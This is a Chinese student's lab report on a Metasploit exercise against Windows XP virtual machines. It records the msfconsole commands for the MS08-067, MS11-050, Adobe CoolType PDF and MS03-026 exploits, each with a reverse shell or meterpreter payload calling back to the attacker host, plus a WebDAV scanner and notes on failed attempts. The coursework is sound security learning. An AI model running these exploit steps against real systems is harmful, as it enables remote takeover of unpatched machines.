标签:没有 arch 自己的 local 过程 安装 proc 作用 不可用
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
一个主动攻击实践,如ms08-067;
一个针对浏览器的攻击,如ms11-050;
一个针对客户端的攻击,如Adobe;
成功应用任何一个辅助模块。
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。
msfconsole
进入msf控制台search ms08_067
查看该漏洞use exploit/windows/smb/ms08_067_netapi
使用该漏洞show payloads
回链攻击载荷
set payload generic/shell_reverse_tcp
tcp反向回连
set LHOST 192.168.126.128
攻击机的ip地址
set LPORT 5229
攻击的端口
set RHOST 192.168.126.136
靶机的ip地址
set target 0
选择目标系统类型
exploit
进行攻击
下图中展现了攻击成功
ipconfig
查看靶机的ip地址进入msfconsole
控制台
输入use windows/browser/ms11_050_mshtml_cobjectelement
命令使用ms11_050漏洞
输入set payload windows/meterpreter/reverse_http
命令使用http反向连接
set LHOST 192.168.126.128
set LPORT 5229
set URIPATH fyh5229
进行攻击exploit
将上图的LOCAL IP 的网址输入进WIN XP中的IE浏览器中,出现遇到问题需要关闭
的窗口。同时360已经给出需要修复的通知。
但是回到KALI建立会话时,IE浏览器已经关闭该网页。
设置浏览器的选项,将安全等级设为最低,且启动了插件设置,但是,会话连接还是失败。。。
msfconsole
进入msf控制台输入search adobe
查找和adobe相关的漏洞
我选择了windows/fileformat/adobe_cooltype_sing
输入set payload windows/meterpreter/reverse_tcp
使用tcp反向连接
set FILENAME 5229.pdf
命令生成pdf文件进行攻击
显示隐藏文件
,这时就能找到隐藏的文件夹了。set payload windows/meterpreter/reverse_tcp
tcp反向连接webdav: WebDAV 一种基于 HTTP 1.1协议的通信协议。由于 WebDAV 已与 Windows XP 和 IIS 集成,因此它具有这两者所提供的安全特性。其中包括 Internet 信息服务管理单元中指定的 IIS 权限和 NTFS 文件系统中的自由选择访问控制列表 (DACL)。
show auxiliary
命令显示所有的辅助模块以及他们的用途。scanner/http/webdav_scanner
show options
查看该漏洞的配置选项webdav
,再次进行攻击,会得到[*] 192.168.126.128 (Microsoft-IIS/6.0) has WEBDAV ENABLED
的消息。Remote Procedure Call (RPC)是Windows操作系统使用的一种远程过程调用协议,RPC提供进程间交互通信机制,允许在某台计算机上运行的程序无缝地在远程系统上执行代码。
use exploit/windows/dcerpc/ms03_026_dcom
set payload windows/meterpreter/reverse_tcp
tcp反向连接show options 查看该漏洞的配置选项
set LHOST 192.168.126.128 设置主机ip
set RHOST 192.168.126.137 设置反弹shell的ip
"无会话已创建"消息发生的情况:
① 使用的漏洞利用对所选择的目标不起作用。可以
是一个不同版本的漏洞,或目标配置有问题。
② 您使用的漏洞利用被配置为使用不创建的有效载荷
互动会话。
根据以上提示,show options
中显示Windows NT SP3-6a/2000/XP/2003 Universal
都可以使用,检测了自己的虚拟机,且使用Microsoft Windows XP Professional
和Microsoft Windows XP Professional SP2
两个版本的虚拟机,都无法建立会话。
检查了所攻击的漏洞,无误。
因为该漏洞与RPC协议还有远程有关,所以我分别打开了虚拟机中的WindowsXP系统安全设置:关闭远程协助和服务(关闭的地方换成打开) 和 XP上显示 ‘RPC 服务器不可用’是什么意思但是还是无法建立会话。
好了,我真的是没法解决这个问题了。。。
用自己的话解释什么是exploit,payload,encode.
exploit
英文翻译为利用
,黑客就是利用漏洞对电脑进行攻击,有漏洞不一定可以利用,但可以利用的一定有漏洞。payload
:有效载荷。通常在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,而其中的原始数据就是payloadencode
:编码器,用来给payload进行编码,保护payload不被发现
这次实验其实不难,但是不代表每次攻击都能成功,也不代表每次攻击都能成功建立会话,我做了好几个实验,成功的占少数,还有些失败的我没写上来。
虽然失败的占多数,但无疑这次实验通过自己查找资料学习漏洞学到了很多知识。
标签:没有 arch 自己的 local 过程 安装 proc 作用 不可用
原文地址:https://www.cnblogs.com/fyhtvxq/p/8968928.html